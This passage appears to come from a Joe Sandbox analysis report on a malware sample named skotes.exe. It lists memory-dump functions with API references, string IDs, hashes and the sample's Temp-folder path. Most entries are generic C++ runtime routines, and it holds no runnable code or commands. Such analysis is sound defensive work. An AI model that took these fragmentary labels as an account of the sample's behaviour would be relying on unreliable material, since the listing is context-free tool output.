                                                                                                                                              • Instruction ID: 558ce2c59793f924f25185475d5dcb5ab66e7bdf6c28e78ffe9dd2a3301450e4
                                                                                                                                              • Opcode Fuzzy Hash: 47d47bb1d6f3ad21345524b87fac94c3602762f5b7532853514cf9a3da8184e6
                                                                                                                                              • Instruction Fuzzy Hash: 2181C172D006459BEF20AF658881AEF7BB5DF0B354F1A405BE904B7341E739CC458BAA
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431B57
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431B66
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C2A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
                                                                                                                                              • String ID: pContext$switchState
                                                                                                                                              • API String ID: 2656283622-2660820399
                                                                                                                                              • Opcode ID: e76d596c2a6809c79cd5f34f046e2284dfce15d2429b44b2e32620d4b4985629
                                                                                                                                              • Instruction ID: b863e61c3d732dd5109429b6f29941dee9b5abb7f1e972ae7809c7e47913e2a3
                                                                                                                                              • Opcode Fuzzy Hash: e76d596c2a6809c79cd5f34f046e2284dfce15d2429b44b2e32620d4b4985629
                                                                                                                                              • Instruction Fuzzy Hash: 8331D835A00204ABCF05EF64C881AAEB775FF4C314F20556BED1197362EB79EE05CA98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsrchr
                                                                                                                                              • String ID: .bat$.cmd$.com$.exe
                                                                                                                                              • API String ID: 1752292252-4019086052
                                                                                                                                              • Opcode ID: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
                                                                                                                                              • Instruction ID: 2fe954d65b4b50834951edb994104e0446c73801206968c056bf44c713a15be5
                                                                                                                                              • Opcode Fuzzy Hash: eebd850b759d80cb09b7359ab37ad9482216c276737184da2b80f0523ace37d9
                                                                                                                                              • Instruction Fuzzy Hash: 8D01086760861635663520199E0276713888BCABB8F25202FFDA4F73C1EF8CDD42A1EC
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041FB06
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                              • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                              • API String ID: 348560076-465693683
                                                                                                                                              • Opcode ID: f58b92d4c4e00bcf5bf27aa27ff47abe9d9d96bf9284f4ef6c35bb9365769995
                                                                                                                                              • Instruction ID: 7446636b43ed96c2ff1984da05a0df0ba88540da13b2bfb01562f330eb4e0c65
                                                                                                                                              • Opcode Fuzzy Hash: f58b92d4c4e00bcf5bf27aa27ff47abe9d9d96bf9284f4ef6c35bb9365769995
                                                                                                                                              • Instruction Fuzzy Hash: DC01D6316813152DA710B7BA7C82FAB25DC9E05749B70043BFC04E3293EDACE808516D
                                                                                                                                              APIs
                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 004320B7
                                                                                                                                                • Part of subcall function 0042CAF3: Mailbox.LIBCMT ref: 0042CB2D
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004320C8
                                                                                                                                              • StructuredWorkStealingQueue.LIBCMT ref: 004320FE
                                                                                                                                              • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0043210F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Work$Concurrency::details::ItemItem::QueueStealingStructured$Mailbox
                                                                                                                                              • String ID: e
                                                                                                                                              • API String ID: 1411586358-4024072794
                                                                                                                                              • Opcode ID: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                              • Instruction ID: 1ff5ec0336f97ae43b1f0b8f375a3bc5f2b05840f56227257267f5d03aa7fa4d
                                                                                                                                              • Opcode Fuzzy Hash: 1b6716c63c17d6c6149872910042524b7f9ebb3f5e3c7538eb01a51a2faaeb53
                                                                                                                                              • Instruction Fuzzy Hash: 9411C131200104ABDF45DE69CB8166B73A4AF0A328F14D05BFD068F242DBF9D905CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • kernel32.dll, xrefs: 0041D04C
                                                                                                                                              • SleepConditionVariableCS, xrefs: 0041D05D
                                                                                                                                              • WakeAllConditionVariable, xrefs: 0041D069
                                                                                                                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0041D03B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___scrt_fastfail
                                                                                                                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                              • API String ID: 2964418898-3242537097
                                                                                                                                              • Opcode ID: 1b85dab98efb64aa57ba8f372f57f10ac0056d4b018687693b19e405e9fa0288
                                                                                                                                              • Instruction ID: e5c7200f62861e871ccb6336968626887421c0a1374ee417b52edda75139816b
                                                                                                                                              • Opcode Fuzzy Hash: 1b85dab98efb64aa57ba8f372f57f10ac0056d4b018687693b19e405e9fa0288
                                                                                                                                              • Instruction Fuzzy Hash: B001F2B1EC2B2169FA303B766D01F9B158A8B46B4EF151023ED04E3290EEA8DC45916E
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::location::_Assign.LIBCMT ref: 0042E91E
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E926
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E950
                                                                                                                                              • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E959
                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E9DC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::Context$Base::$GroupScheduleSegment$AssignAvailableConcurrency::location::_EventInternalMakeProcessor::ReleaseRunnableTraceVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 512098550-0
                                                                                                                                              • Opcode ID: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                                                                                                                                              • Instruction ID: e456b2d5945dcb9d16af89579036fa7bc11e47face3e2a4e749ba7397f49833a
                                                                                                                                              • Opcode Fuzzy Hash: e357eccba9f9281a6441e24871b6c677031b298cf17b8db731c946c7b8307f67
                                                                                                                                              • Instruction Fuzzy Hash: A7418079B00219EFCB09DF65D454A6DB7B1FF48310F00816AE806A7391CB38AE41CF85
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog3_GS.LIBCMT ref: 0041ECED
                                                                                                                                              • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041ED17
                                                                                                                                                • Part of subcall function 0041F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F3FA
                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0041ED53
                                                                                                                                              • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041ED94
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EDC6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2568206803-0
                                                                                                                                              • Opcode ID: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
                                                                                                                                              • Instruction ID: e5ba4aa972b5b687e82aeba40850cce8f465bb6681a4cf65264b7c2e3798f256
                                                                                                                                              • Opcode Fuzzy Hash: 9df4acfc658845fb17537b70fe12277229255bd95a289e64e7df339151908351
                                                                                                                                              • Instruction Fuzzy Hash: 3C31A3B5E001068BCB14DFAAD5415EEB7B4EF49314F64406FE805E7351DB389D82C799
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ReferenceCountedQuickBitSet::InterlockedSet.LIBCONCRT ref: 0042D344
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D367
                                                                                                                                              • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042D370
                                                                                                                                              • ListArray.LIBCONCRT ref: 0042D3A8
                                                                                                                                              • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042D3B3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::$ArrayListVirtual$ActiveAvailableBase::CountedInterlockedMakeProcessorProcessor::QuickReferenceSchedulerSet::
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4212520697-0
                                                                                                                                              • Opcode ID: cc93f9c0c1130ba6bcbaeec2089951f7ca50d0e43d472b8bf48f25f0fa72e60b
                                                                                                                                              • Instruction ID: 794df60462bd40b248f8bb291adde2cc32f8ca71d2bfd1cb23fae4e7b320e9c5
                                                                                                                                              • Opcode Fuzzy Hash: cc93f9c0c1130ba6bcbaeec2089951f7ca50d0e43d472b8bf48f25f0fa72e60b
                                                                                                                                              • Instruction Fuzzy Hash: 3B31B475B00220EFCB05DF55D484BAEB7A5BF88314F54409AEC069B352CB78ED41CB96
                                                                                                                                              APIs
                                                                                                                                              • _SpinWait.LIBCONCRT ref: 004286EE
                                                                                                                                                • Part of subcall function 0041EAD0: _SpinWait.LIBCONCRT ref: 0041EAE8
                                                                                                                                              • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00428702
                                                                                                                                              • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00428734
                                                                                                                                              • List.LIBCMT ref: 004287B7
                                                                                                                                              • List.LIBCMT ref: 004287C6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3281396844-0
                                                                                                                                              • Opcode ID: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
                                                                                                                                              • Instruction ID: 462aa756160b9a796e7fec1675da630e13b8ae80002d108a4576a0d2cee0735b
                                                                                                                                              • Opcode Fuzzy Hash: 077f98613c2620de7065ed2d0a0cf93478308c9c6d3ed21310d4f5dedee47172
                                                                                                                                              • Instruction Fuzzy Hash: C9318832A02265DFCB14EFA5E9816DEB7B1BF44308FA4406FD80167242CB79AD05CB99
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004318A4
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 004318EB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pContext
                                                                                                                                              • API String ID: 3390424672-2046700901
                                                                                                                                              • Opcode ID: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
                                                                                                                                              • Instruction ID: d01a77f2ab9abe46547ca181dc4035302de0eae64105b64324a031690df06c10
                                                                                                                                              • Opcode Fuzzy Hash: e95cf8ccf1556caaf72762b1807beb7f872c2aa3a091a48244363160f3292fa7
                                                                                                                                              • Instruction Fuzzy Hash: 3421EA35B006159BCB19B765D895ABD73A5BF98338F04112BE411872E1CB6CAC428A9D
                                                                                                                                              Strings
                                                                                                                                              • 6C, xrefs: 0043E034
                                                                                                                                              • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0043DFE8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 6C$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                              • API String ID: 0-1188627148
                                                                                                                                              • Opcode ID: 3c2d1bade516e9138db386ecb82b66714fdcc0b789f94945d0f8f753bd50372f
                                                                                                                                              • Instruction ID: 1250e2cc5c3fce4557554197dcf76aeb845fef7d14ba199ebdc59f2273e001e9
                                                                                                                                              • Opcode Fuzzy Hash: 3c2d1bade516e9138db386ecb82b66714fdcc0b789f94945d0f8f753bd50372f
                                                                                                                                              • Instruction Fuzzy Hash: 5C21D37160521DBF9B38AE679C80F2B77BDEF08368F10551AF91492282E768EC009769
                                                                                                                                              APIs
                                                                                                                                              • List.LIBCONCRT ref: 0042AEEA
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042AF0F
                                                                                                                                              • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0042AF4E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pExecutionResource
                                                                                                                                              • API String ID: 1772865662-359481074
                                                                                                                                              • Opcode ID: 8757b6f0ebfc55abe5b247c9d13e7f834f3e243f6a5ed22403078c9b1f0b1de5
                                                                                                                                              • Instruction ID: fa6d3a0e3725f8ef027d180f71de552ac3c936f12b730e52bc2201ef4983df17
                                                                                                                                              • Opcode Fuzzy Hash: 8757b6f0ebfc55abe5b247c9d13e7f834f3e243f6a5ed22403078c9b1f0b1de5
                                                                                                                                              • Instruction Fuzzy Hash: 9A21A9B5B403059BCB04EF55C882BED77A5BF48314F50405FE90167382DB78AE55CB99
                                                                                                                                              APIs
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00424F24
                                                                                                                                              • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00424F66
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                              • String ID: count$ppVirtualProcessorRoots
                                                                                                                                              • API String ID: 2663199487-3650809737
                                                                                                                                              • Opcode ID: 13447b8e231ac65c24fe41b3ecebc36d2f88b520589b9f8e03cb52c67cf159fb
                                                                                                                                              • Instruction ID: 0fe100e528eb00baa15785fa13c2d5db46de6353967fcf2c4de188508199a33a
                                                                                                                                              • Opcode Fuzzy Hash: 13447b8e231ac65c24fe41b3ecebc36d2f88b520589b9f8e03cb52c67cf159fb
                                                                                                                                              • Instruction Fuzzy Hash: 43210034B00224EFCB04EF99D881EAD73A0FF88315F40406FE40697692CB74AE01CB58
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0042BA0E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                              • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                              • API String ID: 348560076-3997890769
                                                                                                                                              • Opcode ID: fb0354458ee7ba9049ff0ad3b1a1bbcc99ce6370e8f2c50a4853d107d9c629f5
                                                                                                                                              • Instruction ID: e921fb3065354ec6b7171669d5441cfe1ec30acbd2610ddc6c285c0b81b9a9f2
                                                                                                                                              • Opcode Fuzzy Hash: fb0354458ee7ba9049ff0ad3b1a1bbcc99ce6370e8f2c50a4853d107d9c629f5
                                                                                                                                              • Instruction Fuzzy Hash: A701F9616813215DE710B7B77C01BAB32DCDF0170DF60582BE940E3192EF6DE80456AE
                                                                                                                                              APIs
                                                                                                                                              • SafeRWList.LIBCONCRT ref: 00426E73
                                                                                                                                                • Part of subcall function 00424E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00424E7F
                                                                                                                                                • Part of subcall function 00424E6E: List.LIBCMT ref: 00424E89
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00426E85
                                                                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00426EAA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: eventObject
                                                                                                                                              • API String ID: 1288476792-1680012138
                                                                                                                                              • Opcode ID: 440c2a349dd4317868f128153035325bcaa8a5a7278390f68b501d5823e75cd8
                                                                                                                                              • Instruction ID: 01ca253de89ce3b15d393a0651f53f227556b71ac39d3dfb13db4180427383f7
                                                                                                                                              • Opcode Fuzzy Hash: 440c2a349dd4317868f128153035325bcaa8a5a7278390f68b501d5823e75cd8
                                                                                                                                              • Instruction Fuzzy Hash: F7112975640214EBDB14EBA5EC82FEF73685F00309F71415BF505B61C1EB38AA04C66D
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0042A102
                                                                                                                                              • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0042A126
                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042A139
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3348907952.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                              • String ID: pScheduler
                                                                                                                                              • API String ID: 246774199-923244539
                                                                                                                                              • Opcode ID: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
                                                                                                                                              • Instruction ID: 10cbf4c553f32a99b29d21dedcc7eb1d51cf5285ac80ee2cb09dfeade9188058
                                                                                                                                              • Opcode Fuzzy Hash: ff4ecc2b4c96439cf4ed42d21673ff17a9682d041d73819743df9b65d3226410
                                                                                                                                              • Instruction Fuzzy Hash: 56F02B35700224A38720FA55FC428AEF3789F80729BA0812FEC0517182DB7CAA19C69E
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                              • Opcode ID: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                                                                                                                                              • Instruction ID: de7e3e00fb04a34b96eeb7253be455e546d1f1f5c91bb76df3f696651397a324
                                                                                                                                              • Opcode Fuzzy Hash: ee1216290e05d5aa883e1d856bebe084c5c42d67d7e9ed6b593ecc55b417bb7c
                                                                                                                                              • Instruction Fuzzy Hash: 5851E171A01A06AFEF289F55D841BBB73B4EF18304F14516FE80197291E739ED41CB99
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000005.00000002.3349537922.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3351570636.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3352270174.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353013061.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353390429.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353567936.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353855620.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353897524.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353939926.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000005.00000002.3353978674.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: EqualOffsetTypeids
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1707706676-0
                                                                                                                                              • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                              • Instruction ID: cef6b095d55e150eee694991f596d606281b118854b35fc2e5d75d5fbf24ef20
                                                                                                                                              • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                              • Instruction Fuzzy Hash: C851BC35A042099FDF10CFA8C4806EEBBF4EF89354F14649BE850A7361D33ABA05CB54
                                                                                                                                              APIs
                                                                                                                                              • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042DB64
